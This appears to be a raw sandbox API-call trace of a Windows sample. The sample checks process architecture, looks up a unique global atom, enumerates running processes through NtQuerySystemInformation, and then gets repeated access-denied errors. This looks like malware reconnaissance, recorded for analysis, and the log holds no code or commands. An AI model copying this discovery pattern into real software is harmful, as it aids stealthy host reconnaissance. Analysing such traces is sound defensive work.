	[0143.652] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.652] CloseHandle (hObject=0x2dc) returned 1
	[0143.652] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.652] CloseHandle (hObject=0x2dc) returned 1
	[0143.652] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.653] CloseHandle (hObject=0x2dc) returned 1
	[0143.653] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.653] CloseHandle (hObject=0x2dc) returned 1
	[0143.653] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.653] CloseHandle (hObject=0x2dc) returned 1
	[0143.653] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.653] CloseHandle (hObject=0x2dc) returned 1
	[0143.654] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.654] CloseHandle (hObject=0x2dc) returned 1
	[0143.654] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.654] CloseHandle (hObject=0x2dc) returned 1
	[0143.654] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.654] CloseHandle (hObject=0x2dc) returned 1
	[0143.654] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.654] CloseHandle (hObject=0x2dc) returned 1
	[0143.655] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.655] CloseHandle (hObject=0x2dc) returned 1
	[0143.655] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.655] CloseHandle (hObject=0x2dc) returned 1
	[0143.655] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.655] CloseHandle (hObject=0x2dc) returned 1
	[0143.656] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.656] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0143.656] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0143.656] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.656] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0143.657] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.657] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0143.657] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0143.657] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0143.657] CloseHandle (hObject=0x2dc) returned 1
	[0143.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0143.657] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.657] CloseHandle (hObject=0x2dc) returned 1
	[0143.658] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.658] CloseHandle (hObject=0x2dc) returned 1
	[0143.658] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.658] CloseHandle (hObject=0x2dc) returned 1
	[0143.658] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.658] CloseHandle (hObject=0x2dc) returned 1
	[0143.658] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.658] CloseHandle (hObject=0x2dc) returned 1
	[0143.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16c38) returned 0xc0000004
	[0143.691] VirtualAlloc (lpAddress=0x0, dwSize=0x16d38, flAllocationType=0x3000, flProtect=0x4) returned 0x3c30000
	[0143.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c30000, Length=0x16d38, ResultLength=0x0 | out: SystemInformation=0x3c30000, ResultLength=0x0) returned 0x0
	[0143.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0143.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0143.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0143.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0143.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0143.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0143.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0143.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0143.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.697] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.698] CloseHandle (hObject=0x2dc) returned 1
	[0143.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0143.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0143.698] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.698] CloseHandle (hObject=0x2dc) returned 1
	[0143.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0143.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.699] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.699] CloseHandle (hObject=0x2dc) returned 1
	[0143.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0143.700] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.700] CloseHandle (hObject=0x2dc) returned 1
	[0143.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0143.700] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.700] CloseHandle (hObject=0x2dc) returned 1
	[0143.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5c10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0143.701] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.701] CloseHandle (hObject=0x2dc) returned 1
	[0143.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0143.701] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.701] CloseHandle (hObject=0x2dc) returned 1
	[0143.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0143.701] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.702] CloseHandle (hObject=0x2dc) returned 1
	[0143.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.702] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.702] CloseHandle (hObject=0x2dc) returned 1
	[0143.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0143.703] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.703] CloseHandle (hObject=0x2dc) returned 1
	[0143.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.703] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.703] CloseHandle (hObject=0x2dc) returned 1
	[0143.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0143.703] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.704] CloseHandle (hObject=0x2dc) returned 1
	[0143.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0143.704] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.704] CloseHandle (hObject=0x2dc) returned 1
	[0143.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0143.704] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.704] CloseHandle (hObject=0x2dc) returned 1
	[0143.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0143.705] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.705] CloseHandle (hObject=0x2dc) returned 1
	[0143.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0143.705] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.705] CloseHandle (hObject=0x2dc) returned 1
	[0143.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0143.706] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.706] CloseHandle (hObject=0x2dc) returned 1
	[0143.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.706] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.706] CloseHandle (hObject=0x2dc) returned 1
	[0143.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0143.707] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.707] CloseHandle (hObject=0x2dc) returned 1
	[0143.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d1a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0143.707] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.707] CloseHandle (hObject=0x2dc) returned 1
	[0143.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5a48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0143.708] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.708] CloseHandle (hObject=0x2dc) returned 1
	[0143.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0143.708] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.708] CloseHandle (hObject=0x2dc) returned 1
	[0143.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9af0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0143.709] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.709] CloseHandle (hObject=0x2dc) returned 1
	[0143.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0143.709] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.709] CloseHandle (hObject=0x2dc) returned 1
	[0143.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0143.709] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.710] CloseHandle (hObject=0x2dc) returned 1
	[0143.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0143.710] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.710] CloseHandle (hObject=0x2dc) returned 1
	[0143.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0143.710] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.710] CloseHandle (hObject=0x2dc) returned 1
	[0143.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d1a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0143.711] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.711] CloseHandle (hObject=0x2dc) returned 1
	[0143.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0143.711] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.711] CloseHandle (hObject=0x2dc) returned 1
	[0143.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0143.712] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.712] CloseHandle (hObject=0x2dc) returned 1
	[0143.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0143.712] GetLastError () returned 0x5
	[0143.712] GetLastError () returned 0x5
	[0143.712] GetLastError () returned 0x5
	[0143.712] GetLastError () returned 0x5
	[0143.712] GetLastError () returned 0x5
	[0143.712] GetLastError () returned 0x5
	[0143.712] GetLastError () returned 0x5
	[0143.712] GetLastError () returned 0x5
	[0143.712] GetLastError () returned 0x5
	[0143.712] GetLastError () returned 0x5
	[0143.712] GetLastError () returned 0x5
	[0143.712] GetLastError () returned 0x5
	[0143.712] GetLastError () returned 0x5
	[0143.712] GetLastError () returned 0x5
	[0143.712] GetLastError () returned 0x5
	[0143.712] GetLastError () returned 0x5
	[0143.712] GetLastError () returned 0x5
	[0143.712] GetLastError () returned 0x5
	[0143.712] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
	[0143.713] GetLastError () returned 0x5
